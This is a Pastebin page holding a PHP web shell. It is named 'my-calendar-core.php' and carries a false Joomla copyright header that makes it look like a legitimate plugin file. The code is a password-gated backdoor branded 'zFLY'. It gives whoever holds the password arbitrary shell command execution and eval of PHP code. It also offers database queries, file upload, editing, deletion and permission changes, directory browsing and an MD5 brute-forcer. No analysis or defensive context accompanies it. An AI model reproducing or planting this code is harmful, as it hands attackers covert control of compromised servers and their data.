API tools faq
paste
Advertisement
PalmaSolutions

my-calendar-core.php

PalmaSolutions
Apr 16th, 2018
168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.20 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * @version $Id: mosimage.btn.php 87 2005-09-15 23:12:03Z eddieajau $
  4. * @package Joomla
  5. * @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
  6. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
  7. * Joomla! is free software. This version may have been modified pursuant
  8. * to the GNU General Public License, and as distributed it includes or
  9. * is derivative of works licensed under the GNU General Public License or
  10. * other free or open source software licenses.
  11. * See COPYRIGHT.php for copyright notices and details.
  12. */
  13. error_reporting(0);
  14.  
  15. $password = "a672811404ec4fec1a9960c2ee139ed7"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
  16.  
  17. $me = basename(__FILE__);
  18. $cookiename = "efDzhiFab4k3";
  19.  
  20.  
  21. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
  22. {
  23.  
  24. if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
  25. {
  26. $_POST['pass'] = md5($_POST['pass']);
  27. }
  28.  
  29. if($_POST['pass'] == $password)
  30. {
  31. setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
  32. }
  33. reload();
  34. }
  35.  
  36.  
  37.  
  38. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
  39. {
  40. login();
  41. die();
  42. }
  43. //
  44. //Do not cross this line! All code placed after this block can't be executed without being logged in!
  45. //
  46.  
  47. if(isset($_GET['p']) && $_GET['p'] == "logout")
  48. {
  49. setcookie ($cookiename, "", time() - 3600);
  50. reload();
  51. }
  52. if(isset($_GET['dir']))
  53. {
  54. chdir($_GET['dir']);
  55. }
  56.  
  57.  
  58. $pages = array(
  59. 'cmd' => 'Execute Command',
  60. 'eval' => 'Evaluate PHP',
  61. 'mysql' => 'MySQL Query',
  62. 'chmod' => 'Chmod File',
  63. 'phpinfo' => 'PHPinfo',
  64. 'md5' => 'md5 cracker',
  65. 'headers' => 'Show headers',
  66. 'logout' => 'Log out'
  67. );
  68.  
  69. //The header, like it?
  70. $header = '<html>
  71. <title>'.getenv("HTTP_HOST").'</title>
  72. <head>
  73. <style>
  74. td {
  75. font-size: 12px;
  76. font-family: verdana;
  77. color: #33FF00;
  78. background: #000000;
  79. }
  80.  
  81. #d {
  82. background: #003000;
  83. }
  84. #f {
  85. background: #003300;
  86. }
  87. #s {
  88. background: #006300;
  89. }
  90. #d:hover
  91. {
  92. background: #003300;
  93. }
  94. #f:hover
  95. {
  96. background: #003000;
  97. }
  98. pre {
  99. font-size: 10px;
  100. font-family: verdana;
  101. color: #33FF00;
  102. }
  103. a:hover {
  104. text-decoration: none;
  105. }
  106.  
  107.  
  108. input,textarea,select {
  109. border-top-width: 1px;
  110. font-weight: bold;
  111. border-left-width: 1px;
  112. font-size: 10px;
  113. border-left-color: #33FF00;
  114. background: #000000;
  115. border-bottom-width: 1px;
  116. border-bottom-color: #33FF00;
  117. color: #33FF00;
  118. border-top-color: #33FF00;
  119. font-family: verdana;
  120. border-right-width: 1px;
  121. border-right-color: #33FF00;
  122. }
  123.  
  124. hr {
  125. color: #33FF00;
  126. background-color: #33FF00;
  127. height: 5px;
  128. }
  129.  
  130. </style>
  131.  
  132. </head>
  133. <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
  134. <table width=100%><td id="header" width=100%>
  135. <p align=right><b>[zFLY] [<a href="'.$me.'">Home</a>] ';
  136.  
  137. foreach($pages as $page => $page_name)
  138. {
  139. $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
  140.  
  141. }
  142. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
  143. print $header;
  144.  
  145. $footer = '<tr><td><hr><center>&copy; <a href="http://">ZflY</a> & <a href="http://">z3t</a></center></td></table></body></head></html>';
  146.  
  147.  
  148. //
  149. //Page handling
  150. //
  151. if(isset($_REQUEST['p']))
  152. {
  153. switch ($_REQUEST['p']) {
  154.  
  155. case 'cmd': //Run command
  156.  
  157. print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
  158. if(isset($_REQUEST['command']))
  159. {
  160. print "<pre>";
  161. execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
  162. }
  163. break;
  164.  
  165.  
  166. case 'edit': //Edit a fie
  167. if(isset($_POST['editform']))
  168. {
  169. $f = $_GET['file'];
  170. $fh = fopen($f, 'w') or print "Error while opening file!";
  171. fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
  172. fclose($fh);
  173. }
  174. print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
  175.  
  176. if(file_exists($_GET['file']))
  177. {
  178. $rd = file($_GET['file']);
  179. foreach($rd as $l)
  180. {
  181. print htmlspecialchars($l);
  182. }
  183. }
  184.  
  185. print "</textarea><input type=submit value=\"Save\"></form>";
  186.  
  187. break;
  188.  
  189. case 'delete': //Delete a file
  190.  
  191. if(isset($_POST['yes']))
  192. {
  193. if(unlink($_GET['file']))
  194. {
  195. print "File deleted successfully.";
  196. }
  197. else
  198. {
  199. print "Couldn't delete file.";
  200. }
  201. }
  202.  
  203.  
  204. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  205. {
  206. print "Are you sure you want to delete ".$_GET['file']."?<br>
  207. <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
  208. <input type=hidden name=yes value=yes>
  209. <input type=submit value=\"Delete\">
  210. ";
  211. }
  212.  
  213.  
  214. break;
  215.  
  216.  
  217. case 'eval': //Evaluate PHP code
  218.  
  219. print "<form action=\"".$me."?p=eval\" method=POST>
  220. <textarea cols=60 rows=10 name=\"eval\">";
  221. if(isset($_POST['eval']))
  222. {
  223. print htmlspecialchars($_POST['eval']);
  224. }
  225. else
  226. {
  227. print "print \"Yo Momma\";";
  228. }
  229. print "</textarea><br>
  230. <input type=submit value=\"Eval\">
  231. </form>";
  232.  
  233. if(isset($_POST['eval']))
  234. {
  235. print "<h1>Output:</h1>";
  236. print "<br>";
  237. eval($_POST['eval']);
  238. }
  239.  
  240. break;
  241.  
  242. case 'chmod': //Chmod file
  243.  
  244.  
  245. print "<h1>Under construction!</h1>";
  246. if(isset($_POST['chmod']))
  247. {
  248. switch ($_POST['chvalue']){
  249. case 777:
  250. chmod($_POST['chmod'],0777);
  251. break;
  252. case 644:
  253. chmod($_POST['chmod'],0644);
  254. break;
  255. case 755:
  256. chmod($_POST['chmod'],0755);
  257. break;
  258. }
  259. print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
  260. }
  261. if(isset($_GET['file']))
  262. {
  263. $content = urldecode($_GET['file']);
  264. }
  265. else
  266. {
  267. $content = "file/path/please";
  268. }
  269.  
  270. print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
  271. <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
  272. <select name=\"chvalue\">
  273. <option value=\"777\">777</option>
  274. <option value=\"644\">644</option>
  275. <option value=\"755\">755</option>
  276. </select><input type=submit value=\"Change\">";
  277.  
  278. break;
  279.  
  280. case 'mysql': //MySQL Query
  281.  
  282. if(isset($_POST['host']))
  283. {
  284. $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
  285. mysql_select_db($_POST['dbase']);
  286. $sql = $_POST['query'];
  287.  
  288.  
  289. $result = mysql_query($sql);
  290.  
  291. }
  292. else
  293. {
  294. print "
  295. This only queries the database, doesn't return data!<br>
  296. <form action=\"".$me."?p=mysql\" method=POST>
  297. <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
  298. <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
  299. <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
  300. <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
  301.  
  302. <b>Query:<br></b<textarea name=query></textarea>
  303. <input type=submit value=\"Query database\">
  304. </form>
  305. ";
  306.  
  307. }
  308.  
  309. break;
  310.  
  311. case 'createdir':
  312. if(mkdir($_GET['crdir']))
  313. {
  314. print 'Directory created successfully.';
  315. }
  316. else
  317. {
  318. print 'Couldn\'t create directory';
  319. }
  320. break;
  321.  
  322.  
  323. case 'phpinfo': //PHP Info
  324. phpinfo();
  325. break;
  326.  
  327.  
  328. case 'rename':
  329.  
  330. if(isset($_POST['fileold']))
  331. {
  332. if(rename($_POST['fileold'],$_POST['filenew']))
  333. {
  334. print "File renamed.";
  335. }
  336. else
  337. {
  338. print "Couldn't rename file.";
  339. }
  340.  
  341. }
  342. if(isset($_GET['file']))
  343. {
  344. $file = basename(htmlspecialchars($_GET['file']));
  345. }
  346. else
  347. {
  348. $file = "";
  349. }
  350.  
  351. print "Renaming ".$file." in folder ".realpath('.').".<br>
  352. <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
  353. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  354. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  355. <input type=submit value=\"Rename file\">
  356. </form>";
  357. break;
  358.  
  359. case 'md5':
  360. if(isset($_POST['md5']))
  361. {
  362. if(!is_numeric($_POST['timelimit']))
  363. {
  364. $_POST['timelimit'] = 30;
  365. }
  366. set_time_limit($_POST['timelimit']);
  367. if(strlen($_POST['md5']) == 32)
  368. {
  369.  
  370. if($_POST['chars'] == "9999")
  371. {
  372. $i = 0;
  373. while($_POST['md5'] != md5($i) && $i != 100000)
  374. {
  375. $i++;
  376. }
  377. }
  378. else
  379. {
  380. for($i = "a"; $i != "zzzzz"; $i++)
  381. {
  382. if(md5($i == $_POST['md5']))
  383. {
  384. break;
  385. }
  386. }
  387. }
  388.  
  389.  
  390. if(md5($i) == $_POST['md5'])
  391. {
  392. print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
  393. }
  394.  
  395. }
  396.  
  397. }
  398.  
  399. print "Will bruteforce the md5
  400. <form action=\"".$me."?p=md5\" method=POST>
  401. <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
  402. <b>Characters:</b><br><select name=\"chars\">
  403. <option value=\"az\">a - zzzzz</option>
  404. <option value=\"9999\">1 - 9999999</option>
  405. </select>
  406. <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
  407. <input type=submit value=\"Bruteforce md5\">
  408. </form><br>*: if set_time_limit is allowed by php.ini";
  409. break;
  410.  
  411. case 'headers':
  412. foreach(getallheaders() as $header => $value)
  413. {
  414. print htmlspecialchars($header . ":" . $value)."<br>";
  415.  
  416. }
  417. break;
  418. }
  419.  
  420. }
  421. else //Default page that will be shown when the page isn't found or no page is selected.
  422. {
  423.  
  424. $files = array();
  425. $directories = array();
  426.  
  427. if(isset($_FILES['uploadedfile']['name']))
  428. {
  429. $target_path = realpath('.').'/';
  430. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  431.  
  432. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  433. print "File:". basename( $_FILES['uploadedfile']['name']).
  434. " has been uploaded";
  435. } else{
  436. echo "File upload failed!";
  437. }
  438. }
  439.  
  440.  
  441.  
  442.  
  443.  
  444. print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
  445. if ($handle = opendir('.'))
  446. {
  447. while (false !== ($file = readdir($handle)))
  448. {
  449. if(is_dir($file))
  450. {
  451. $directories[] = $file;
  452. }
  453. else
  454. {
  455. $files[] = $file;
  456. }
  457. }
  458. asort($directories);
  459. asort($files);
  460. foreach($directories as $file)
  461. {
  462. print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  463. }
  464.  
  465. foreach($files as $file)
  466. {
  467. print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  468. }
  469. }
  470. else
  471. {
  472. print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
  473. }
  474.  
  475. print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
  476. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  477. <input type=\"submit\" value=\"Upload File\" />
  478. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
  479. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
  480. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
  481. </table>";
  482.  
  483.  
  484. }
  485.  
  486.  
  487. function login()
  488. {
  489. print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
  490. <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
  491. <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
  492. </form>";
  493. }
  494. function reload()
  495. {
  496. header("Location: ".basename(__FILE__));
  497. }
  498.  
  499. function get_execution_method()
  500. {
  501. if(function_exists('passthru')){ $m = "passthru"; }
  502. if(function_exists('exec')){ $m = "exec"; }
  503. if(function_exists('shell_exec')){ $m = "shell_ exec"; }
  504. if(function_exists('system')){ $m = "system"; }
  505. if(!isset($m)) //No method found :-|
  506. {
  507. $m = "Disabled";
  508. }
  509. return($m);
  510. }
  511.  
  512. function execute_command($method,$command)
  513. {
  514. if($method == "passthru")
  515. {
  516. passthru($command);
  517. }
  518.  
  519. elseif($method == "exec")
  520. {
  521. exec($command,$result);
  522. foreach($result as $output)
  523. {
  524. print $output."<br>";
  525. }
  526. }
  527.  
  528. elseif($method == "shell_exec")
  529. {
  530. print shell_exec($command);
  531. }
  532.  
  533. elseif($method == "system")
  534. {
  535. system($command);
  536. }
  537.  
  538. }
  539.  
  540. function perm($file)
  541. {
  542. if(file_exists($file))
  543. {
  544. return substr(sprintf('%o', fileperms($file)), -4);
  545. }
  546. else
  547. {
  548. return "????";
  549. }
  550. }
  551.  
  552. function get_color($file)
  553. {
  554. if(is_writable($file)) { return "green";}
  555. if(!is_writable($file) && is_readable($file)) { return "white";}
  556. if(!is_writable($file) && !is_readable($file)) { return "red";}
  557.  
  558.  
  559.  
  560. }
  561.  
  562. function show_dirs($where)
  563. {
  564. if(ereg("^c:",realpath($where)))
  565. {
  566. $dirparts = explode('\\',realpath($where));
  567. }
  568. else
  569. {
  570. $dirparts = explode('/',realpath($where));
  571. }
  572.  
  573.  
  574.  
  575. $i = 0;
  576. $total = "";
  577.  
  578. foreach($dirparts as $part)
  579. {
  580. $p = 0;
  581. $pre = "";
  582. while($p != $i)
  583. {
  584. $pre .= $dirparts[$p]."/";
  585. $p++;
  586.  
  587. }
  588. $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  589. $i++;
  590. }
  591.  
  592. return "<h2>".$total."</h2><br>";
  593.  
  594. }
  595. print $footer;
  596.  
  597. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
  598. exit();
  599. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!